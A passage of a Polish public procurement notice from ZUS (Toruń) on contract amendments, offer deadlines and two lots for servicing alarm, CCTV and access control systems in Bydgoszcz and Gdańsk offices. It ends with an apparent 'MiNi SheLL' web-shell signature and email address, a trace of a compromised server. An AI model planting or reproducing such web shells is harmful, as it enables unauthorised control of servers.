3.	W przypadku zmiany przepisów, o których mowa w ust. 1 pkt 2, skutkujących istotną zmianą kosztów wykonania przedmiotu umowy przez Wykonawcę, każda ze stron Umowy, w terminie 30 dni od dnia wejścia w życie przepisów wprowadzających te zmiany, może wystąpić do drugiej Strony o przeprowadzenie negocjacji w sprawie dokonania odpowiedniej zmiany wysokości wynagrodzenia.

4.	Podstawą do przeprowadzenia negocjacji, o których mowa w ust. 3 będzie przedstawiana każdorazowo Zamawiającemu kalkulacja kosztów Wykonawcy, uwzględniająca wpływ wejścia w życie przepisów wprowadzających te zmiany na koszty wykonania przedmiotu umowy przez Wykonawcę. 
		Wykonawca będzie zobowiązany do przedstawienia stosownej kalkulacji na 	pisemne żądanie Zamawiającego, w terminie 5 dni roboczych od otrzymania 	żądania.

5.	Zmiana treści umowy wymaga zachowania formy pisemnej pod rygorem nieważności.

6.	Każda ze Stron może jednostronnie dokonać zmiany treści umowy w zakresie zmiany osób, numerów telefonów, faksów oraz adresów, wskazanych w niniejszej umowie, powiadamiając o tym pisemnie drugą stronę, w terminie nie dłuższym niż 7 dni od dokonania zmiany. Zmiany te nie wymagają formy aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl/zampub<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZUS Oddział w Toruniu przy ul. Mickiewicza 33-39, pokój nr 325..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2014 godzina 11:00, miejsce: ZUS Oddział w Toruniu przy ul. Mickiewicza 33-39, pokój nr 325..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> SERWIS SYSTEMÓW SYGNALIZACJI POŻARU, WŁAMANIA, NAPADU, TV PRZEMYSŁOWEJ ORAZ KONTROLI DOSTĘPU - ZUS, ODDZIAŁ W BYDGOSZCZY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1	Przedmiotem zamówienia jest wykonywanie Serwisu, polegającego na:

1)	konserwacjach* i przeglądach** (zwanych łącznie konserwacjami) oraz naprawach*** systemów:
a)	pożaru;
b)	włamania;
c)	napadu;
d)	TV przemysłowej;
e)	kontroli dostępu;
- eksploatowanych w ZUS Oddział w Bydgoszczy.
1)	Część pierwsza przedmiotu zamówienia obejmuje Serwis systemów w wymienionych poniżej jednostkach ZUS:

a)	Oddział w Bydgoszczy przy ul. Św. Trójcy 33;
b)	Oddział w Bydgoszczy przy ul. Konopnickiej 18A:
- budynek A;
- budynek B;
c)	Inspektorat w Nakle n. Notecią przy ul. Bohaterów 12a;
d)	Inspektorat w Świeciu przy ul. Wojska Polskiego 87a;
e)	Inspektorat w Tucholi przy ul. Dworcowej 8;
f)	Inspektorat w Żninie przy ul. 700-lecia 37;
g)	Inspektorat w Bydgoszczy przy ul. Andersena 6;
h)	Inspektorat w Inowrocławiu przy ul. Solankowej 15;
i)	Biuro Terenowe w Sępólnie Krajeńskim przy ul. Kościuszki 16;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. czas przystępowania do naprawy - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> SERWIS SYSTEMÓW SYGNALIZACJI POŻARU, WŁAMANIA, NAPADU, TV PRZEMYSŁOWEJ ORAZ KONTROLI DOSTĘPU - ZUS, ODDZIAŁ W GDAŃSKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1	Przedmiotem zamówienia jest wykonywanie Serwisu, polegającego na:
2)	konserwacjach* i przeglądach** (zwanych łącznie konserwacjami) systemów:
a)	pożaru;
b)	włamania;
c)	napadu;
d)	TV przemysłowej;
e)	kontroli dostępu;
- eksploatowanych w ZUS Oddział w Gdańsku.
2)	Część druga przedmiotu zamówienia obejmuje Serwis systemów w wymienionych poniżej jednostkach ZUS:

a)	Inspektorat w Pucku przy ul. Orzeszkowej 3;
b)	Inspektorat w Wejherowie przy ul. Sobieskiego 294:
- Stary budynek,
- Nowy budynek;
c)	Inspektorat w Gdyni przy ul. Władysława IV 24;
d)	Inspektorat w Sopocie przy Al. Niepodległości 796;
e)	Jednostka Organizacyjna w Gdańsku-Wrzeszczu przy ul. Sobótki 18;
f)	Jednostka Organizacyjna w Gdańsku-Wrzeszczu przy:
- ul. Marynarki Polskiej 146;
- ul. Marynarki Polskiej 146A;
g)	Inspektorat w Gdańsku-Wrzeszczu przy ul. Tuwima 9;
h)	Inspektorat w Malborku przy ul. Dworcowej 1B;
i)	Inspektorat w Kwidzynie przy ul. Piłsudskiego 29A;
j)	Inspektorat w Sztumie przy ul. Mickiewicza34;
k)	Oddział w Gdańsku przy ul. Chmielnej 27/33;
l)	Inspektorat w Pruszczu Gdańskim przy ul. Wita Stwosza 7;
m)	Inspektorat w Tczewie przy ul. Jagiellońskiej 55;
n)	Inspektorat w Starogardzie Gdańskim przy ul. Piłsudskiego 4;
o)	Inspektorat w Kościerzynie przy ul. 3 Maja 9;
p)	Inspektorat w Kartuzach przy ul. Ceynowy 5;
q)	Inspektorat w Gdańsku-Śródmieściu przy ul. Chlebnickiej 3/8..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. czas przystępowania do diagnozowania przyczyn awarii - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com